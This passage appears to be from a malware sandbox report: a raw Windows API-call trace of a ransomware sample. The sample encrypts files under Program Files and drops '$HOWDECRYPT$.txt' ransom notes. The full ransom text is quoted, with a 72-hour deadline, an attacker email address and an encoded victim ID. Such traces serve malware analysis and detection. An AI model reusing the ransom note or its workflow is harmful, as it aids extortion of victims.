lpMem=0x346d48 | out: hHeap=0x2c0000) returned 1 [0092.387] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc00 | out: pbBuffer=0x270fc00) returned 1 [0092.387] GetProcessHeap () returned 0x2c0000 [0092.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.387] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbf8*=0x30) returned 1 [0092.387] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\navsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.387] GetProcessHeap () returned 0x2c0000 [0092.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.387] GetProcessHeap () returned 0x2c0000 [0092.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0092.388] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbf8 | out: pbBuffer=0x270fbf8) returned 1 [0092.388] GetProcessHeap () returned 0x2c0000 [0092.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.388] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbf0*=0x30) returned 1 [0092.388] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\mainmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.389] GetProcessHeap () returned 0x2c0000 [0092.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.389] GetProcessHeap () returned 0x2c0000 [0092.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3781c0 | out: hHeap=0x2c0000) returned 1 [0092.389] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbf8 | out: pbBuffer=0x270fbf8) returned 1 [0092.389] GetProcessHeap () returned 0x2c0000 [0092.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.389] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbf0*=0x30) returned 1 [0092.389] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\lightbluerectangle.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.389] GetProcessHeap () returned 0x2c0000 [0092.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.389] GetProcessHeap () returned 0x2c0000 [0092.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3780d8 | out: hHeap=0x2c0000) returned 1 [0092.389] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbf0 | out: pbBuffer=0x270fbf0) returned 1 [0092.389] GetProcessHeap () returned 0x2c0000 [0092.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.389] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbe8*=0x30) returned 1 [0092.389] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.390] GetProcessHeap () returned 0x2c0000 [0092.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.390] GetProcessHeap () returned 0x2c0000 [0092.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355698 | out: hHeap=0x2c0000) returned 1 [0092.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbf0 | out: pbBuffer=0x270fbf0) returned 1 [0092.390] GetProcessHeap () returned 0x2c0000 [0092.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.390] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbe8*=0x30) returned 1 [0092.390] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboyscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.390] GetProcessHeap () returned 0x2c0000 [0092.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.390] GetProcessHeap () returned 0x2c0000 [0092.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f328 | out: hHeap=0x2c0000) returned 1 [0092.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbe8 | out: pbBuffer=0x270fbe8) returned 1 [0092.390] GetProcessHeap () returned 0x2c0000 [0092.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.390] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbe0*=0x30) returned 1 [0092.391] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.391] GetProcessHeap () returned 0x2c0000 [0092.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.391] GetProcessHeap () returned 0x2c0000 [0092.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3555a0 | out: hHeap=0x2c0000) returned 1 [0092.391] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbe8 | out: pbBuffer=0x270fbe8) returned 1 [0092.391] GetProcessHeap () returned 0x2c0000 [0092.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.391] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbe0*=0x30) returned 1 [0092.391] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.391] GetProcessHeap () returned 0x2c0000 [0092.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.391] GetProcessHeap () returned 0x2c0000 [0092.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f508 | out: hHeap=0x2c0000) returned 1 [0092.391] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbe0 | out: pbBuffer=0x270fbe0) returned 1 [0092.391] GetProcessHeap () returned 0x2c0000 [0092.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.392] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbd8*=0x30) returned 1 [0092.392] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.392] GetProcessHeap () returned 0x2c0000 [0092.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.392] GetProcessHeap () returned 0x2c0000 [0092.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381880 | out: hHeap=0x2c0000) returned 1 [0092.392] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbe0 | out: pbBuffer=0x270fbe0) returned 1 [0092.392] GetProcessHeap () returned 0x2c0000 [0092.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.392] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbd8*=0x30) returned 1 [0092.392] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.392] GetProcessHeap () returned 0x2c0000 [0092.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.392] GetProcessHeap () returned 0x2c0000 [0092.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d810 | out: hHeap=0x2c0000) returned 1 [0092.393] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbd8 | out: pbBuffer=0x270fbd8) returned 1 [0092.393] GetProcessHeap () returned 0x2c0000 [0092.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.393] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbd0*=0x30) returned 1 [0092.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.393] GetProcessHeap () returned 0x2c0000 [0092.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.393] GetProcessHeap () returned 0x2c0000 [0092.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d4f0 | out: hHeap=0x2c0000) returned 1 [0092.393] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbd8 | out: pbBuffer=0x270fbd8) returned 1 [0092.393] GetProcessHeap () returned 0x2c0000 [0092.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.393] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbd0*=0x30) returned 1 [0092.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.394] GetProcessHeap () returned 0x2c0000 [0092.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.394] GetProcessHeap () returned 0x2c0000 [0092.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d680 | out: hHeap=0x2c0000) returned 1 [0092.394] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbd0 | out: pbBuffer=0x270fbd0) returned 1 [0092.394] GetProcessHeap () returned 0x2c0000 [0092.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.394] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbc8*=0x30) returned 1 [0092.394] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.395] GetProcessHeap () returned 0x2c0000 [0092.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.395] GetProcessHeap () returned 0x2c0000 [0092.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34cf98 | out: hHeap=0x2c0000) returned 1 [0092.395] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbd0 | out: pbBuffer=0x270fbd0) returned 1 [0092.395] GetProcessHeap () returned 0x2c0000 [0092.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.395] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbc8*=0x30) returned 1 [0092.395] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.395] GetProcessHeap () returned 0x2c0000 [0092.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.395] GetProcessHeap () returned 0x2c0000 [0092.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d748 | out: hHeap=0x2c0000) returned 1 [0092.395] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbc8 | out: pbBuffer=0x270fbc8) returned 1 [0092.395] GetProcessHeap () returned 0x2c0000 [0092.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.395] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbc0*=0x30) returned 1 [0092.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdatl3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.396] GetProcessHeap () returned 0x2c0000 [0092.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.396] GetProcessHeap () returned 0x2c0000 [0092.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ca58 | out: hHeap=0x2c0000) returned 1 [0092.397] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbc8 | out: pbBuffer=0x270fbc8) returned 1 [0092.397] GetProcessHeap () returned 0x2c0000 [0092.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.397] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbc0*=0x30) returned 1 [0092.397] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasqlr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.397] GetProcessHeap () returned 0x2c0000 [0092.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.397] GetProcessHeap () returned 0x2c0000 [0092.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d5b8 | out: hHeap=0x2c0000) returned 1 [0092.397] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbc0 | out: pbBuffer=0x270fbc0) returned 1 [0092.397] GetProcessHeap () returned 0x2c0000 [0092.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.397] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbb8*=0x30) returned 1 [0092.397] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdasql.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.397] GetProcessHeap () returned 0x2c0000 [0092.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.397] GetProcessHeap () returned 0x2c0000 [0092.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34c998 | out: hHeap=0x2c0000) returned 1 [0092.398] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbc0 | out: pbBuffer=0x270fbc0) returned 1 [0092.398] GetProcessHeap () returned 0x2c0000 [0092.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.398] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbb8*=0x30) returned 1 [0092.398] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.398] GetProcessHeap () returned 0x2c0000 [0092.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.398] GetProcessHeap () returned 0x2c0000 [0092.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34c8d8 | out: hHeap=0x2c0000) returned 1 [0092.398] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fbb8 | out: pbBuffer=0x270fbb8) returned 1 [0092.398] GetProcessHeap () returned 0x2c0000 [0092.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.398] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fbb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fbb0*=0x30) returned 1 [0092.398] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msdaosp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.398] GetProcessHeap () returned 0x2c0000 [0092.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.399] GetProcessHeap () returned 0x2c0000 [0092.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34d058 | out: hHeap=0x2c0000) returned 1 [0092.399] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.400] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.400] WriteFile (in: hFile=0x178, lpBuffer=0x270faeb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fc14, lpOverlapped=0x0 | out: lpBuffer=0x270faeb*, lpNumberOfBytesWritten=0x270fc14*=0x127, lpOverlapped=0x0) returned 1 [0092.401] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.401] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fc14, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fc14*=0x2ac, lpOverlapped=0x0) returned 1 [0092.402] CloseHandle (hObject=0x178) returned 1 [0092.402] GetProcessHeap () returned 0x2c0000 [0092.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e3b0 | out: hHeap=0x2c0000) returned 1 [0092.402] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.404] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.404] WriteFile (in: hFile=0x178, lpBuffer=0x270fae7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fc10, lpOverlapped=0x0 | out: lpBuffer=0x270fae7*, lpNumberOfBytesWritten=0x270fc10*=0x127, lpOverlapped=0x0) returned 1 [0092.405] lstrlenA 